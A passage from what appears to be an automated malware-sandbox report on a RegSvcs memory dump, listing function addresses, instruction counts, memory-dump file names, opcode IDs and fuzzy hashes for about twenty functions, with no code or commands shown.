                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c7cfd679b5cb4771ed1b4a692a6c7a6db4eb8456839b903fa65507d6ad3e65f0
                                                                                            • Instruction ID: 6998b6c7102aec3f9371632183bb043f29656a48b30c5580585be79b9eab0939
                                                                                            • Opcode Fuzzy Hash: c7cfd679b5cb4771ed1b4a692a6c7a6db4eb8456839b903fa65507d6ad3e65f0
                                                                                            • Instruction Fuzzy Hash: 7111C432B406509BCB15CF59C4C4A16B7E9AF4A7A0B28C06EED0DDF205DAB2DD03D792
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FAAAEE Relevance: .1, Instructions: 68COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                            • Instruction ID: bc022a04e60bf628005f8b9c526e7e2c40407fd47bfd0ac71b964c71fd41a96d
                                                                                            • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                            • Instruction Fuzzy Hash: 4D218EB2A00641DFC731DF49C540A66F7E6EBD5BA0F25803DE44697621C734ED05EB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F780E9 Relevance: .1, Instructions: 66COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e6ac13f9209ac653e8b5c7c98332224b7bd6e5e09537be266386eb4a05250836
                                                                                            • Instruction ID: 16168ef51e07d423d0b90ff9cc155097c17b363fdae4477afe81db0aecaaf76e
                                                                                            • Opcode Fuzzy Hash: e6ac13f9209ac653e8b5c7c98332224b7bd6e5e09537be266386eb4a05250836
                                                                                            • Instruction Fuzzy Hash: 54218E32A40245DFCB14CF58C581BAEBBB5FB88368F20816ED109A7310CBB1AD07DB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FA674D Relevance: .1, Instructions: 65COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 271b25927a861eb6bdedd13274e9c0e09b33ee6f19fe0fae3ea536448e067a0f
                                                                                            • Instruction ID: bc03151cfcfc947be15154a3cb621549abc51ec9c2a58afe8c5c965174428825
                                                                                            • Opcode Fuzzy Hash: 271b25927a861eb6bdedd13274e9c0e09b33ee6f19fe0fae3ea536448e067a0f
                                                                                            • Instruction Fuzzy Hash: C4218CB1620A00EFC7209F69C881B66B3E8FF85754F14882DE4AAC7250DE74BD40EB60
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F6EA80 Relevance: .1, Instructions: 64COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ab8dffb11121f97b0d6348f6b4ac151dfac8d01258e13e7ba5ddec933a553434
                                                                                            • Instruction ID: 3c240c1a5604617abd368448239fdfe46009c0350e1f85a2a47fdbb33d554fcf
                                                                                            • Opcode Fuzzy Hash: ab8dffb11121f97b0d6348f6b4ac151dfac8d01258e13e7ba5ddec933a553434
                                                                                            • Instruction Fuzzy Hash: E6119DB1501711AFD3219F26CD81E57BBF8FF45784B00882DE14A87621D774E804DBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F9E8C0 Relevance: .1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1e9dc61f3301feaca4d50f52c3927e3c83bb6f999fabe57affce21c68292482e
                                                                                            • Instruction ID: f2f0a391abc84ccad6680e276688f984fe7d42ea5c54fa605cf9cda429ffb177
                                                                                            • Opcode Fuzzy Hash: 1e9dc61f3301feaca4d50f52c3927e3c83bb6f999fabe57affce21c68292482e
                                                                                            • Instruction Fuzzy Hash: 181104736001149BCF19DB24CC81A6B729BEFD5370B394539E9238B391E935DD02E790
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01006870 Relevance: .1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 99cd0c37a8e338d53c13e16b4fe77868b917f6b1269759deab2ae36f3bc9b9d4
                                                                                            • Instruction ID: 96001634611762ecab14b9c914abbd28c765422c75ecb1929290c292a9749b1f
                                                                                            • Opcode Fuzzy Hash: 99cd0c37a8e338d53c13e16b4fe77868b917f6b1269759deab2ae36f3bc9b9d4
                                                                                            • Instruction Fuzzy Hash: 9811C132240504EFE723DB59CD40F9A77EDEB49B50F014024F281DB2A1DA76E911C790
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FA66B0 Relevance: .1, Instructions: 61COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5bd5f29d48f5a7c5146b022f005d98595a2a35ab8dc0cb5ac2d76ba2cfe56566
                                                                                            • Instruction ID: e3d62311e2e579631b974130f223e6d4f13e2c97d59a7e12cedaaf53ac868cbc
                                                                                            • Opcode Fuzzy Hash: 5bd5f29d48f5a7c5146b022f005d98595a2a35ab8dc0cb5ac2d76ba2cfe56566
                                                                                            • Instruction Fuzzy Hash: D711C4B6E11204DFCB24DF59C580A5ABBE4AF85714F194079E805EB321DA38DD00EB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0103A8E4 Relevance: .1, Instructions: 61COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                            • Instruction ID: 2fe2e7e34382b7b014bc4464621b7c8bdb37569256061aeebf4725394810007e
                                                                                            • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                            • Instruction Fuzzy Hash: B311E236A00919EFDB19CB58C801A9DBBF9EFC4310F05826AE885A7350E671AE01CB80
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F70AD0 Relevance: .1, Instructions: 61COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                            • Instruction ID: 3f8bb54bd3f8e5f2a13ea84a9c1914ad09ad54233cf3dd7a9e9144c9100ef443
                                                                                            • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                            • Instruction Fuzzy Hash: BF21F4B5A00B059FD3A0CF29C441B52BBF4FB48B20F10892AE98AC7B40E771E914CB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FFE7E1 Relevance: .1, Instructions: 59COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                            • Instruction ID: 2183e143cfc85fc641330c734ca2db9435eb7009f3e3d0c76d4ed3a01616ada2
                                                                                            • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                            • Instruction Fuzzy Hash: 0811A032A00608EFDB20AF44CC41B66B7A5EF45BA0F158429FA099B271DB75DD40FB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F927ED Relevance: .1, Instructions: 58COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: eeac68dd2bbd32b247be3f6adedbc6d1ee5147c09beb08f4c6926a8902c91b19
                                                                                            • Instruction ID: 8561f21a8ce63f0e6f347dc99bf6dea5083a6675d437fe24da4c87d1d56205c6
                                                                                            • Opcode Fuzzy Hash: eeac68dd2bbd32b247be3f6adedbc6d1ee5147c09beb08f4c6926a8902c91b19
                                                                                            • Instruction Fuzzy Hash: CA012632B05648ABE726A26ADC44F67778EEF417A4F190076F8008B691DA18DC00F2A6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F74690 Relevance: .1, Instructions: 57COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 56bef9ffadb665906b4668be06a52482c696590a97dd44a12ed7e76b1b461bee
                                                                                            • Instruction ID: 662c58e3e42730b192ba70625f618ae4581172e047820fcf2544eb5bcb63d1b9
                                                                                            • Opcode Fuzzy Hash: 56bef9ffadb665906b4668be06a52482c696590a97dd44a12ed7e76b1b461bee
                                                                                            • Instruction Fuzzy Hash: 6F11C236640644AFCB29CF59D880F567BA4EB86B74F108116F918CB250C774FC41EF62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FA6620 Relevance: .1, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f5c45c0d15f3364d64d75ca451f037ea19f1020ab4780ef642653a819539e25a
                                                                                            • Instruction ID: e45583d2e34d61497b7cfc7e56de1c0567ccd1e2ce9b1ad473a36c94a523bbef
                                                                                            • Opcode Fuzzy Hash: f5c45c0d15f3364d64d75ca451f037ea19f1020ab4780ef642653a819539e25a
                                                                                            • Instruction Fuzzy Hash: 8211C2B6D00714ABCB21EF58CD81B5EF7B8EF45B50F540455E904AB301D774AE01AB50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F9EA2E Relevance: .1, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fddae83800fac50bc00f83bc1fe5c5a06763f966166077975ab2867b38081d68
                                                                                            • Instruction ID: 02ef689aa29ad7555bc95132715a8dd70a5a2a9d808ac58e8f1a4eaef04c58e1
                                                                                            • Opcode Fuzzy Hash: fddae83800fac50bc00f83bc1fe5c5a06763f966166077975ab2867b38081d68
                                                                                            • Instruction Fuzzy Hash: 28019E715001089FDB29EF15D845F56B7F9FB95368F20826AE0498B2B5CB78AC42DB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F9E53E Relevance: .1, Instructions: 55COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                            • Instruction ID: cd74a99476abf44ed1c0683cdd80777bde4c396e03c8b05b98c310b364b0bed6
                                                                                            • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                            • Instruction Fuzzy Hash: 9A110233A016C59BEB22A7288C54F6437D4AB00B68F1E00B2E902C7752E32CDC42F211
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FFE75D Relevance: .1, Instructions: 54COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                            • Instruction ID: 8b75aeef49d7f2a8d6943627629204105d45dc9bd71244f1b94159615fcc0b07
                                                                                            • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                            • Instruction Fuzzy Hash: 4801D233A40108AFD725AF58CC01F7AB6A9EF80B60F158125FA159B270E775DD40E790
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F6A250 Relevance: .1, Instructions: 52COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                            • Instruction ID: 58ad617fc492539b746d94d21eaba051884314f0411c6c641eed62e0cddc6456
                                                                                            • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                            • Instruction Fuzzy Hash: 44010032844B119BCB208F16D840A727BB8EB55B707008A2DF896AB281C735D800EFA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01044940 Relevance: .1, Instructions: 52COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 04f29cce58fdb21ddfb4bb4f6f5d0b0726d06ab45f9113f7f62a9d42cbbf3c20
                                                                                            • Instruction ID: 333d11fb3e3207318ac8536eae9754294886943f2a7d44d1666b853897524fc2
